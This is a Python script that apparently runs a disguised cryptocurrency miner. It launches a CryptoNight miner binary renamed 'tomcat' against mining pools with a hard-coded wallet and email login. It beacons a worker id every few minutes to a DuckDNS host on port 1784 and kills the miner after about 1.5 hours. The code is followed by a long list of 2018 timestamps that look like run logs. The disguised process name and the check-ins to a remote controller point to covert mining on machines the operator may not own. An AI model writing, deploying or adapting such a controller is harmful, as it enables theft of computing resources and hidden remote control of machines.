import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:07.859904
#2018-02-17 16:56:07.070161
#2018-02-17 18:46:06.708593
#2018-02-17 20:35:05.030046
#2018-02-17 22:21:02.051261
#2018-02-18 00:04:06.444739
#2018-02-18 01:55:07.704555
#2018-02-18 03:43:06.142167
#2018-02-18 05:31:06.515333
#2018-02-18 07:23:04.782909
#2018-02-18 09:11:07.131792
#2018-02-18 10:57:04.471522
#2018-02-18 12:43:04.984447
#2018-02-18 14:30:07.659019
#2018-02-18 16:20:04.952030
#2018-02-18 18:08:05.903270
#2018-02-18 19:54:05.947796
#2018-02-18 21:41:03.830931
#2018-02-18 23:29:01.447174
#2018-02-19 01:16:01.332923
#2018-02-19 03:02:01.438134
#2018-02-19 04:47:05.802662
#2018-02-19 06:32:05.169688
#2018-02-19 08:21:01.243734
#2018-02-19 10:11:06.095577
#2018-02-19 11:59:06.763399
#2018-02-19 13:46:06.992725
#2018-02-19 15:36:07.250199
#2018-02-19 17:24:09.405106
#2018-02-19 19:13:08.269233
#2018-02-19 20:58:06.570640
#2018-02-19 22:46:06.765140
#2018-02-20 00:31:07.552064
#2018-02-20 02:19:04.539564
#2018-02-20 04:09:06.845458
#2018-02-20 05:52:01.639667
#2018-02-20 07:38:04.113837
#2018-02-20 09:22:04.508203
#2018-02-20 11:07:08.459502
#2018-02-20 12:53:08.040584
#2018-02-20 14:37:04.111380
#2018-02-20 16:21:07.074070
#2018-02-20 18:07:06.547732
#2018-02-20 19:58:08.010298
#2018-02-20 21:47:01.690796
#2018-02-20 23:27:08.875032
#2018-02-21 01:13:02.091162
#2018-02-21 03:01:07.930674
#2018-02-21 04:49:04.322216
#2018-02-21 06:37:05.990186
#2018-02-21 08:23:04.806843
#2018-02-21 10:08:09.110746
#2018-02-21 11:58:05.747710
#2018-02-21 13:47:08.250901
#2018-02-21 15:31:07.225290
#2018-02-21 17:22:05.676069
#2018-02-21 19:09:06.066120
#2018-02-21 20:57:06.724162
#2018-02-21 22:45:05.176093
#2018-02-22 00:36:04.112663
#2018-02-22 02:23:07.055986
#2018-02-22 04:10:04.196075
#2018-02-22 05:55:01.478767
#2018-02-22 07:41:08.094816
#2018-02-22 09:31:07.436626
#2018-02-22 11:16:09.281780
#2018-02-22 13:01:11.753541
#2018-02-22 14:49:08.695353
#2018-02-22 16:36:04.858418
#2018-02-22 18:22:06.550986
#2018-02-22 20:16:06.262089
#2018-02-22 22:02:01.703824
#2018-02-22 23:49:01.418764
#2018-02-23 01:38:03.612802
#2018-02-23 03:23:07.624041
#2018-02-23 05:10:04.867815
#2018-02-23 06:55:03.020780
#2018-02-23 08:45:09.107536
#2018-02-23 11:01:07.210532
#2018-02-23 12:56:01.447828
#2018-02-23 14:41:01.658941
#2018-02-23 16:31:07.098773
#2018-02-23 18:17:07.284982
#2018-02-23 20:01:05.957836
#2018-02-23 21:44:07.383164
#2018-02-23 23:37:05.633390
#2018-02-24 01:26:02.177037
#2018-02-24 03:16:05.828990
#2018-02-24 05:01:01.354918
#2018-02-24 06:49:05.988252
#2018-02-24 08:39:03.772247
#2018-02-24 10:23:01.425291
#2018-02-24 12:18:04.180613
#2018-02-24 14:39:07.241697
#2018-02-24 16:28:06.243419
#2018-02-24 18:20:04.927338
#2018-02-24 20:06:06.843336
#2018-02-24 21:49:05.589825
#2018-02-25 00:50:07.338425
#2018-02-25 04:47:05.232634
#2018-02-25 09:05:01.844596